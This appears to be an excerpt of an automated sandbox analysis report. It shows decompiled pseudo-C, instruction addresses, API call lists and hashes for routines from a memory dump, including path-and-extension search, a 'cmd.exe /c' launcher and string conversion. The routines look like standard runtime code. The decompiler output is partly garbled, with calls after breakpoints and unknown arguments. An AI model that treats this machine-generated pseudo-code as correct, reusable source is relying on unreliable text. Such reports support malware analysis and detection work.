				void* _t127;

				_push(_t84);
				_push(__esi);
				_t118 = _a8;
				if(_t118 != 0) {
					if( *_t118 == 0) {
						goto L1;
					} else {
						_t35 = _a12;
						if(_t35 == 0) {
							goto L1;
						} else {
							_t36 =  *_t35;
							if(_t36 == 0 ||  *_t36 == 0) {
								goto L1;
							} else {
								_push(__ebx);
								_push(__edi);
								_t112 = E00B176D7(_t118, 0x5c);
								_t38 = E00B176D7(_t118, 0x2f);
								_t126 = _t125 + 0x10;
								_t78 = _t118;
								if(_t38 != 0) {
									if(_t112 == 0 || _t38 > _t112) {
										_t112 = _t38;
									}
									goto L19;
								} else {
									if(_t112 != 0) {
										L19:
										asm("sbb esi, esi");
										_t122 =  ~(_t118 - _t78) & _t78;
										if(E00B176D7(_t112, 0x2e) == 0) {
											_t88 = _t78;
											_t9 = _t88 + 2; // 0x2
											_t109 = _t9;
											do {
												_t40 =  *_t88;
												_t88 = _t88 + 2;
											} while (_t40 != 0);
											_t10 = (_t88 - _t109 >> 1) + 5; // 0x3
											_v8 = _t10;
											_t114 = E00AF4F03(_t88 - _t109 >> 1, _t10, 2);
											if(_t114 != 0) {
												_t79 = _v8;
												_t43 = E00B011FA(_t114, _t79, _t78);
												_t127 = _t126 + 0xc;
												if(_t43 == 0) {
													_v8 = _t114 + (_t79 + 0xfffffffb) * 2;
													_t58 = E00AF69E3();
													_t81 = L".com";
													_v12 =  *_t58;
													while(1) {
														_t60 = E00B011FA(_v8, 5, _t81);
														_t127 = _t127 + 0xc;
														if(_t60 != 0) {
															goto L38;
														}
														if(E00AFF377(_t81, _t122, _t114, _t60) == 0) {
															 *((intOrPtr*)(E00AF69E3())) = _v12;
															_t82 = E00AFE67B(_t81, _t114, _t122, _a4, _t114, _a12, _a16);
															goto L34;
														} else {
															_t81 = _t81 + 0xa;
															if(_t81 != 0xb1e3ac) {
																continue;
															} else {
																L00AF4D62(_t114);
																goto L32;
															}
														}
														goto L39;
													}
												}
												goto L38;
											} else {
												_t82 = _t78 | 0xffffffff;
												L34:
												L00AF4D62(_t114);
												goto L35;
											}
										} else {
											if(E00AFF377(_t78, _t122, _t78, 0) != 0) {
												L32:
												_t82 = _t81 | 0xffffffff;
											} else {
												_t82 = E00AFE67B(_t78, _t112, _t122, _a4, _t78, _a12, _a16);
											}
											L35:
											L00AF4D62(_t122);
											_t34 = _t82;
											goto L36;
										}
									} else {
										_t112 = E00B176D7(_t118, 0x3a);
										if(_t112 != 0) {
											goto L19;
										} else {
											_t103 = _t118;
											_t3 = _t103 + 2; // 0x2
											_t110 = _t3;
											do {
												_t71 =  *_t103;
												_t103 = _t103 + 2;
											} while (_t71 != _t112);
											_t4 = (_t103 - _t110 >> 1) + 3; // 0x1
											_t116 = _t4;
											_t78 = E00AF4F03(_t103 - _t110 >> 1, _t4, 2);
											if(_t78 != 0) {
												_t73 = E00B011FA(_t78, _t116, 0xb1e37c);
												_t127 = _t126 + 0xc;
												if(_t73 != 0) {
													L38:
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													_push(0);
													E00AF68E9();
													asm("int3");
													return CreateProcessA( *_v40,  *_v36,  *_v32,  *_v28,  *_v24,  *_v20,  *_v16,  *_v12,  *_v8,  *_v4);
												} else {
													_t74 = E00B01125(_t78, _t116, _t118);
													_t127 = _t127 + 0xc;
													if(_t74 != 0) {
														goto L38;
													} else {
														_t5 = _t78 + 4; // 0x4
														_t112 = _t5;
														L00AF4D62(_t74);
														goto L19;
													}
												}
											} else {
												_t34 = L00AF4D62(_t72) | 0xffffffff;
												L36:
												goto L37;
											}
										}
									}
								}
							}
						}
					}
				} else {
					L1:
					 *((intOrPtr*)(E00AF69E3())) = 0x16;
					_t34 = E00AF68BC() | 0xffffffff;
					L37:
					return _t34;
				}
				L39:
			}








































                                                  0x00afe1eb
                                                  0x00afe1ec
                                                  0x00afe1ed
                                                  0x00afe1f2
                                                  0x00afe211
                                                  0x00000000
                                                  0x00afe213
                                                  0x00afe213
                                                  0x00afe218
                                                  0x00000000
                                                  0x00afe21a
                                                  0x00afe21a
                                                  0x00afe21e
                                                  0x00000000
                                                  0x00afe225
                                                  0x00afe225
                                                  0x00afe226
                                                  0x00afe232
                                                  0x00afe234
                                                  0x00afe239
                                                  0x00afe23c
                                                  0x00afe240
                                                  0x00afe2cb
                                                  0x00afe2d1
                                                  0x00afe2d1
                                                  0x00000000
                                                  0x00afe246
                                                  0x00afe248
                                                  0x00afe2d3
                                                  0x00afe2d9
                                                  0x00afe2dc
                                                  0x00afe2e7
                                                  0x00afe315
                                                  0x00afe319
                                                  0x00afe319
                                                  0x00afe31c
                                                  0x00afe31c
                                                  0x00afe31f
                                                  0x00afe322
                                                  0x00afe32d
                                                  0x00afe331
                                                  0x00afe339
                                                  0x00afe33f
                                                  0x00afe34a
                                                  0x00afe34f
                                                  0x00afe354
                                                  0x00afe359
                                                  0x00afe365
                                                  0x00afe368
                                                  0x00afe36d
                                                  0x00afe374
                                                  0x00afe377
                                                  0x00afe37d
                                                  0x00afe382
                                                  0x00afe387
                                                  0x00000000
                                                  0x00000000
                                                  0x00afe394
                                                  0x00afe3bb
                                                  0x00afe3c9
                                                  0x00000000
                                                  0x00afe396
                                                  0x00afe396
                                                  0x00afe39f
                                                  0x00000000
                                                  0x00afe3a1
                                                  0x00afe3a2
                                                  0x00000000
                                                  0x00afe3a7
                                                  0x00afe39f
                                                  0x00000000
                                                  0x00afe394
                                                  0x00afe377
                                                  0x00000000
                                                  0x00afe341
                                                  0x00afe341
                                                  0x00afe3cb
                                                  0x00afe3cc
                                                  0x00000000
                                                  0x00afe3d1
                                                  0x00afe2e9
                                                  0x00afe2f6
                                                  0x00afe3a8
                                                  0x00afe3a8
                                                  0x00afe2fc
                                                  0x00afe30e
                                                  0x00afe30e
                                                  0x00afe3d2
                                                  0x00afe3d3
                                                  0x00afe3d8
                                                  0x00000000
                                                  0x00afe3d8
                                                  0x00afe24e
                                                  0x00afe256
                                                  0x00afe25c
                                                  0x00000000
                                                  0x00afe25e
                                                  0x00afe25e
                                                  0x00afe260
                                                  0x00afe260
                                                  0x00afe263
                                                  0x00afe263
                                                  0x00afe266
                                                  0x00afe269
                                                  0x00afe274
                                                  0x00afe274
                                                  0x00afe27d
                                                  0x00afe283
                                                  0x00afe29a
                                                  0x00afe29f
                                                  0x00afe2a4
                                                  0x00afe3e2
                                                  0x00afe3e4
                                                  0x00afe3e5
                                                  0x00afe3e6
                                                  0x00afe3e7
                                                  0x00afe3e8
                                                  0x00afe3e9
                                                  0x00afe3ee
                                                  0x00afe42d
                                                  0x00afe2aa
                                                  0x00afe2ad
                                                  0x00afe2b2
                                                  0x00afe2b7
                                                  0x00000000
                                                  0x00afe2bd
                                                  0x00afe2be
                                                  0x00afe2be
                                                  0x00afe2c1
                                                  0x00000000
                                                  0x00afe2c6
                                                  0x00afe2b7
                                                  0x00afe285
                                                  0x00afe28b
                                                  0x00afe3da
                                                  0x00000000
                                                  0x00afe3dc
                                                  0x00afe283
                                                  0x00afe25c
                                                  0x00afe248
                                                  0x00afe240
                                                  0x00afe21e
                                                  0x00afe218
                                                  0x00afe1f4
                                                  0x00afe1f4
                                                  0x00afe1f9
                                                  0x00afe204
                                                  0x00afe3dd
                                                  0x00afe3e1
                                                  0x00afe3e1
                                                  0x00000000

                                                  APIs
                                                  • _free.LIBCMT ref: 00AFE286
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 00AFE426
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Process$CreateCurrentFeaturePresentProcessorTerminate_free
                                                  • String ID: .com
                                                  • API String ID: 1469932949-4200470757
                                                  • Opcode ID: db68d646feadfd2fb2fbcb4777e10d0302ab92b0cfda5a266ca39aa159e274cc
                                                  • Instruction ID: c731dd7cad8e6c317c63c95240cfb83abd0c1e1ff835129197572b6557961979
                                                  • Opcode Fuzzy Hash: db68d646feadfd2fb2fbcb4777e10d0302ab92b0cfda5a266ca39aa159e274cc
                                                  • Instruction Fuzzy Hash: 9061033650020DAFDF24EFA8DC86DBB37A9EF49360B100268FB158B2B1EB71DC109651
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004078CF, Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				signed int _t49;
				signed int _t54;
				int _t56;
				signed int _t58;
				short* _t60;
				signed int _t64;
				short* _t68;
				int _t76;
				short* _t79;
				signed int _t85;
				signed int _t88;
				void* _t93;
				void* _t94;
				int _t96;
				short* _t99;
				int _t101;
				int _t103;
				signed int _t104;
				short* _t105;
				void* _t108;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x412014; // 0x9e6834eb
				_v8 = _t49 ^ _t104;
				_t101 = _a20;
				if(_t101 > 0) {
					_t76 = E004080DB(_a16, _t101);
					_t108 = _t76 - _t101;
					_t4 = _t76 + 1; // 0x1
					_t101 = _t4;
					if(_t108 >= 0) {
						_t101 = _t76;
					}
				}
				_t96 = _a32;
				if(_t96 == 0) {
					_t96 =  *( *_a4 + 8);
					_a32 = _t96;
				}
				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					E004018CC();
					return _t54;
				} else {
					_t93 = _t54 + _t54;
					_t83 = _t93 + 8;
					asm("sbb eax, eax");
					if((_t93 + 0x00000008 & _t54) == 0) {
						_t79 = 0;
						__eflags = 0;
						L14:
						if(_t79 == 0) {
							L36:
							_t103 = 0;
							L37:
							E004063D5(_t79);
							_t54 = _t103;
							goto L38;
						}
						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
						_t119 = _t56;
						if(_t56 == 0) {
							goto L36;
						}
						_t98 = _v12;
						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
						_t103 = _t58;
						if(_t103 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t94 = _t103 + _t103;
							_t85 = _t94 + 8;
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							__eflags = _t85 & _t58;
							if((_t85 & _t58) == 0) {
								_t99 = 0;
								__eflags = 0;
								L30:
								__eflags = _t99;
								if(__eflags == 0) {
									L35:
									E004063D5(_t99);
									goto L36;
								}
								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
								__eflags = _t60;
								if(_t60 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
								__eflags = _t103;
								if(_t103 != 0) {
									E004063D5(_t99);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t88 = _t94 + 8;
							__eflags = _t94 - _t88;
							asm("sbb eax, eax");
							_t64 = _t58 & _t88;
							_t85 = _t94 + 8;
							__eflags = _t64 - 0x400;
							if(_t64 > 0x400) {
								__eflags = _t94 - _t85;
								asm("sbb eax, eax");
								_t99 = E00403E3D(_t85, _t64 & _t85);
								_pop(_t85);
								__eflags = _t99;
								if(_t99 == 0) {
									goto L35;
								}
								 *_t99 = 0xdddd;
								L28:
								_t99 =  &(_t99[4]);
								goto L30;
							}
							__eflags = _t94 - _t85;
							asm("sbb eax, eax");
							E004018E0();
							_t99 = _t105;
							__eflags = _t99;
							if(_t99 == 0) {
								goto L35;
							}
							 *_t99 = 0xcccc;
							goto L28;
						}
						_t68 = _a28;
						if(_t68 == 0) {
							goto L37;
						}
						_t123 = _t103 - _t68;
						if(_t103 > _t68) {
							goto L36;
						}
						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
						if(_t103 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t70 = _t54 & _t93 + 0x00000008;
					_t83 = _t93 + 8;
					if((_t54 & _t93 + 0x00000008) > 0x400) {
						__eflags = _t93 - _t83;
						asm("sbb eax, eax");
						_t79 = E00403E3D(_t83, _t70 & _t83);
						_pop(_t83);
						__eflags = _t79;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t79 = 0xdddd;
						L12:
						_t79 =  &(_t79[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E004018E0();
					_t79 = _t105;
					if(_t79 == 0) {
						goto L36;
					}
					 *_t79 = 0xcccc;
					goto L12;
				}
			}


























                                                  0x004078d4
                                                  0x004078d5
                                                  0x004078d6
                                                  0x004078dd
                                                  0x004078e2
                                                  0x004078e8
                                                  0x004078ee
                                                  0x004078f4
                                                  0x004078f7
                                                  0x004078f7
                                                  0x004078fa
                                                  0x004078fc
                                                  0x004078fc
                                                  0x004078fa
                                                  0x004078fe
                                                  0x00407903
                                                  0x0040790a
                                                  0x0040790d
                                                  0x0040790d
                                                  0x00407929
                                                  0x0040792f
                                                  0x00407934
                                                  0x00407ac7
                                                  0x00407ad2
                                                  0x00407ada
                                                  0x0040793a
                                                  0x0040793a
                                                  0x0040793d
                                                  0x00407942
                                                  0x00407946
                                                  0x0040799a
                                                  0x0040799a
                                                  0x0040799c
                                                  0x0040799e
                                                  0x00407abc
                                                  0x00407abc
                                                  0x00407abe
                                                  0x00407abf
                                                  0x00407ac5
                                                  0x00000000
                                                  0x00407ac5
                                                  0x004079af
                                                  0x004079b5
                                                  0x004079b7
                                                  0x00000000
                                                  0x00000000
                                                  0x004079bd
                                                  0x004079cf
                                                  0x004079d4
                                                  0x004079d8
                                                  0x00000000
                                                  0x00000000
                                                  0x004079e5
                                                  0x00407a1f
                                                  0x00407a22
                                                  0x00407a25
                                                  0x00407a27
                                                  0x00407a29
                                                  0x00407a2b
                                                  0x00407a77
                                                  0x00407a77
                                                  0x00407a79
                                                  0x00407a79
                                                  0x00407a7b
                                                  0x00407ab5
                                                  0x00407ab6
                                                  0x00000000
                                                  0x00407abb
                                                  0x00407a8f
                                                  0x00407a94
                                                  0x00407a96
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a9a
                                                  0x00407a9b
                                                  0x00407a9c
                                                  0x00407a9f
                                                  0x00407adb
                                                  0x00407ade
                                                  0x00407aa1
                                                  0x00407aa1
                                                  0x00407aa2
                                                  0x00407aa2
                                                  0x00407aaf
                                                  0x00407ab1
                                                  0x00407ab3
                                                  0x00407ae4
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407ab3
                                                  0x00407a2d
                                                  0x00407a30
                                                  0x00407a32
                                                  0x00407a34
                                                  0x00407a36
                                                  0x00407a39
                                                  0x00407a3e
                                                  0x00407a59
                                                  0x00407a5b
                                                  0x00407a65
                                                  0x00407a67
                                                  0x00407a68
                                                  0x00407a6a
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a6c
                                                  0x00407a72
                                                  0x00407a72
                                                  0x00000000
                                                  0x00407a72
                                                  0x00407a40
                                                  0x00407a42
                                                  0x00407a46
                                                  0x00407a4b
                                                  0x00407a4d
                                                  0x00407a4f
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a51
                                                  0x00000000
                                                  0x00407a51
                                                  0x004079e7
                                                  0x004079ec
                                                  0x00000000
                                                  0x00000000
                                                  0x004079f2
                                                  0x004079f4
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a10
                                                  0x00407a14
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00407a1a
                                                  0x0040794d
                                                  0x0040794f
                                                  0x00407951
                                                  0x00407959
                                                  0x00407978
                                                  0x0040797a
                                                  0x00407984
                                                  0x00407986
                                                  0x00407987
                                                  0x00407989
                                                  0x00000000
                                                  0x00000000
                                                  0x0040798f
                                                  0x00407995
                                                  0x00407995
                                                  0x00000000
                                                  0x00407995
                                                  0x0040795d
                                                  0x00407961
                                                  0x00407966
                                                  0x0040796a
                                                  0x00000000
                                                  0x00000000
                                                  0x00407970
                                                  0x00000000
                                                  0x00407970

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                                                  • __alloca_probe_16.LIBCMT ref: 00407961
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                                                  • __alloca_probe_16.LIBCMT ref: 00407A46
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                                                  • __freea.LIBCMT ref: 00407AB6
                                                    • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004), ref: 00403E6F
                                                  • __freea.LIBCMT ref: 00407ABF
                                                  • __freea.LIBCMT ref: 00407AE4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                  • String ID:
                                                  • API String ID: 3864826663-0
                                                  • Opcode ID: 2acbdce31c841228e4f1b43f9461c59ea2f4b9e7753061a6b0d4f9641481498b
                                                  • Instruction ID: 6b6c65cbb01c1feb5c42b87555946cb45975c344a51f119bfb313b5904e0f739
                                                  • Opcode Fuzzy Hash: 2acbdce31c841228e4f1b43f9461c59ea2f4b9e7753061a6b0d4f9641481498b
                                                  • Instruction Fuzzy Hash: BA51D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0C2F4, Relevance: 12.2, APIs: 8, Instructions: 153COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E00B0C2F4(void* __ebx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr* _a16) {
				intOrPtr* _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v40;
				char _v52;
				void* __ecx;
				void* __edi;
				void* __esi;
				intOrPtr* _t33;
				intOrPtr* _t36;
				intOrPtr _t39;
				void* _t48;
				intOrPtr _t55;
				signed int _t60;
				signed int _t63;
				intOrPtr _t76;
				signed int _t79;
				void* _t81;
				signed int _t84;
				intOrPtr _t86;
				void* _t90;
				void* _t91;

				_push(_t62);
				_t33 = _a16;
				_t76 = _a8;
				_push(__ebx);
				_t60 = _a12;
				_t79 = 0;
				_v8 = _t33;
				_t63 = 0;
				_t84 = 0;
				_v12 = 0;
				L1:
				while(1) {
					if(_t63 < _t33) {
						L10:
						 *((intOrPtr*)(_t60 + _t63 * 4)) = _t76;
						_t63 = _t63 + 1;
						_v12 = _t63;
						if(_t76 == 0) {
							_t84 = _t79;
							_t79 = _t60;
							goto L15;
						} else {
							_t36 = _a4;
							 *_t36 =  *_t36 + 4;
							_t76 =  *((intOrPtr*)( *_t36 - 4));
							_t33 = _v8;
							_a8 = _t76;
							continue;
						}
					} else {
						if(_t33 >= 0x7fffffff) {
							L13:
							 *((intOrPtr*)(E00AF69E3())) = 0xc;
							goto L15;
						} else {
							_t39 = _t33 + _t33;
							_push(4);
							_v8 = _t39;
							_push(_t39);
							if(_t60 != _a12) {
								_t60 = E00B06285(_t84);
								_t90 = _t90 + 0xc;
								if(_t60 == 0) {
									 *((intOrPtr*)(E00AF69E3())) = 0xc;
									L00AF4D62(_t79);
									L15:
									L00AF4D62(_t84);
									return _t79;
								} else {
									L00AF4D62(_t79);
									L00AF4D62(_t79);
									goto L9;
								}
							} else {
								_t60 = E00AF4F03(_t63);
								L00AF4D62(_t84);
								_t84 = _t60;
								L00AF4D62(_t79);
								_t91 = _t90 + 0x10;
								if(_t60 == 0) {
									goto L13;
								} else {
									_t48 = E00AF08D1(_t60, _v8, _a12, _a16);
									_t90 = _t91 + 0x10;
									if(_t48 == 0) {
										L9:
										_t63 = _v12;
										_t84 = _t60;
										_t76 = _a8;
										goto L10;
									} else {
										_push(_t79);
										_push(_t79);
										_push(_t79);
										_push(_t79);
										_push(_t79);
										E00AF68E9();
										asm("int3");
										_push(_t63);
										_push(_t63);
										_push(_t84);
										_push(_t79);
										_t81 = 0;
										_v52 = 0;
										if(E00B0C4CD(_t60, _t63, 0, _t84, _v40,  &_v52) == 0) {
											_v36 = 0;
											_push( &_v36);
											_push(_v16);
											if(E00B0C680(_t60, 0, _t84) == 0) {
												_t86 = 0;
												 *_v12 = _v32;
												_t55 = 0;
												 *_v8 = _v36;
											} else {
												_t86 = _v32;
												_t81 = 0xffffffff;
												_t55 = _v36;
											}
											L00AF4D62(_t55);
										} else {
											_t86 = _v32;
											_t81 = 0xffffffff;
										}
										L00AF4D62(_t86);
										return _t81;
									}
								}
							}
						}
					}
				}
			}



























                                                  0x00b0c2fa
                                                  0x00b0c2fb
                                                  0x00b0c2fe
                                                  0x00b0c301
                                                  0x00b0c302
                                                  0x00b0c307
                                                  0x00b0c309
                                                  0x00b0c30c
                                                  0x00b0c30e
                                                  0x00b0c310
                                                  0x00000000
                                                  0x00b0c313
                                                  0x00b0c315
                                                  0x00b0c388
                                                  0x00b0c388
                                                  0x00b0c38b
                                                  0x00b0c38c
                                                  0x00b0c391
                                                  0x00b0c3ca
                                                  0x00b0c3cc
                                                  0x00000000
                                                  0x00b0c393
                                                  0x00b0c393
                                                  0x00b0c396
                                                  0x00b0c39b
                                                  0x00b0c39e
                                                  0x00b0c3a1
                                                  0x00000000
                                                  0x00b0c3a1
                                                  0x00b0c317
                                                  0x00b0c31c
                                                  0x00b0c3bd
                                                  0x00b0c3c2
                                                  0x00000000
                                                  0x00b0c322
                                                  0x00b0c322
                                                  0x00b0c324
                                                  0x00b0c326
                                                  0x00b0c329
                                                  0x00b0c32d
                                                  0x00b0c369
                                                  0x00b0c36b
                                                  0x00b0c370
                                                  0x00b0c3af
                                                  0x00b0c3b5
                                                  0x00b0c3ce
                                                  0x00b0c3cf
                                                  0x00b0c3dd
                                                  0x00b0c372
                                                  0x00b0c373
                                                  0x00b0c379
                                                  0x00000000
                                                  0x00b0c37f
                                                  0x00b0c32f
                                                  0x00b0c335
                                                  0x00b0c337
                                                  0x00b0c33d
                                                  0x00b0c33f
                                                  0x00b0c344
                                                  0x00b0c349
                                                  0x00000000
                                                  0x00b0c34b
                                                  0x00b0c355
                                                  0x00b0c35a
                                                  0x00b0c35f
                                                  0x00b0c380
                                                  0x00b0c380
                                                  0x00b0c383
                                                  0x00b0c385
                                                  0x00000000
                                                  0x00b0c361
                                                  0x00b0c3de
                                                  0x00b0c3df
                                                  0x00b0c3e0
                                                  0x00b0c3e1
                                                  0x00b0c3e2
                                                  0x00b0c3e3
                                                  0x00b0c3e8
                                                  0x00b0c3ee
                                                  0x00b0c3ef
                                                  0x00b0c3f0
                                                  0x00b0c3f1
                                                  0x00b0c3f5
                                                  0x00b0c3fb
                                                  0x00b0c407
                                                  0x00b0c414
                                                  0x00b0c417
                                                  0x00b0c418
                                                  0x00b0c424
                                                  0x00b0c434
                                                  0x00b0c43c
                                                  0x00b0c43e
                                                  0x00b0c443
                                                  0x00b0c426
                                                  0x00b0c426
                                                  0x00b0c429
                                                  0x00b0c42c
                                                  0x00b0c42c
                                                  0x00b0c446
                                                  0x00b0c409
                                                  0x00b0c409
                                                  0x00b0c40c
                                                  0x00b0c40c
                                                  0x00b0c44d
                                                  0x00b0c45a
                                                  0x00b0c45a
                                                  0x00b0c35f
                                                  0x00b0c349
                                                  0x00b0c32d
                                                  0x00b0c31c
                                                  0x00b0c315

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 64dc16bb04fa401ccd08bd8973b9b87391c85e4311ec7b539b9bedb34a7e9f79
                                                  • Instruction ID: fa814bc2aa5693d687dd733ead897ea523cc3437065614cbd7a423d2b047a210
                                                  • Opcode Fuzzy Hash: 64dc16bb04fa401ccd08bd8973b9b87391c85e4311ec7b539b9bedb34a7e9f79
                                                  • Instruction Fuzzy Hash: 5D41A972600208EFDF14EF99D98197EBFF9EF85320B248299FE1497391DB709D009665
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AE368A, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 214COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 59%
                                                  			E00AE368A(signed int __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				intOrPtr _v56;
				signed int _v68;
				char _v88;
				intOrPtr* _v112;
				intOrPtr* _v116;
				signed int _t37;
				void* _t40;
				char* _t41;
				signed int* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t54;
				signed int _t56;
				void* _t59;
				char* _t60;
				signed int* _t67;
				signed int _t69;
				intOrPtr* _t70;
				signed int _t73;
				void* _t95;
				signed int _t97;
				intOrPtr _t99;
				signed int _t102;
				signed int _t110;
				signed int _t111;
				void* _t113;
				signed int _t114;
				void* _t117;

				_t95 = __edx;
				_t78 = __ebx;
				_t37 =  *0xb26018; // 0xb47fd95f
				_v8 = _t37 ^ _t110;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = _a4;
				_t102 = 0;
				_v28 = 0;
				_t40 = L00AFDEE9( &_v28, 0, "COMSPEC");
				_t114 = _t113 + 0xc;
				if(_t40 == 0 || _t40 != 0x16) {
					if(_t97 != 0) {
						_t41 = _v28;
						_v24 = _t41;
						_v20 = "/c";
						_v16 = _t97;
						_v12 = _t102;
						if(_t41 == 0) {
							L12:
							_push(_t102);
							_v24 = "cmd.exe";
							_t102 = E00AFF2FC(_t78, _t95, _t97, _t102, _t102, "cmd.exe",  &_v24);
						} else {
							_t97 =  *((intOrPtr*)(E00AF69E3()));
							_t48 = E00AF69E3();
							_push(_t102);
							 *_t48 = _t102;
							_push( &_v24);
							_t50 = L00AFEB59(_t78, _t97, _t102, _t102, _v24);
							_t114 = _t114 + 0x10;
							_t78 = _t50;
							_t51 = E00AF69E3();
							if(_t78 == 0xffffffff) {
								if( *_t51 == 2 ||  *((intOrPtr*)(E00AF69E3())) == 0xd) {
									 *((intOrPtr*)(E00AF69E3())) = _t97;
									goto L12;
								} else {
									_t102 = _t102 | 0xffffffff;
								}
							} else {
								 *_t51 = _t97;
								_t102 = _t78;
							}
						}
					} else {
						if(_v28 != _t102) {
							_t54 = E00AFF44F(_t78, _t102, _v28, _t102);
							asm("sbb esi, esi");
							_t102 =  ~_t54 + 1;
						}
					}
					L00AF4D62(_v28);
					return L00AD1DCD(_v8 ^ _t110);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E00AF68E9();
					asm("int3");
					_push(_t110);
					_t111 = _t114;
					_t56 =  *0xb26018; // 0xb47fd95f
					_v68 = _t56 ^ _t111;
					_push(__ebx);
					_push(0);
					_push(_t97);
					_t99 = _v56;
					_t106 = 0;
					_v88 = 0;
					_t59 = L00AFDF07( &_v88, 0, L"COMSPEC");
					_t117 = _t114 - 0x18 + 0xc;
					if(_t59 == 0 || _t59 != 0x16) {
						if(_t99 != 0) {
							_t60 = _v32;
							_v28 = _t60;
							_v24 = L"/c";
							_v20 = _t99;
							_v16 = _t106;
							if(_t60 == 0) {
								L27:
								_push(_t106);
								_v28 = L"cmd.exe";
								_t106 = E00AFF354(_t78, _t95, _t99, _t106, _t106, L"cmd.exe",  &_v28);
							} else {
								_t99 =  *((intOrPtr*)(E00AF69E3()));
								_t67 = E00AF69E3();
								_push(_t106);
								 *_t67 = _t106;
								_push( &_v28);
								_t69 = E00AFEBB1(_t78, _t99, _t106, _t106, _v28);
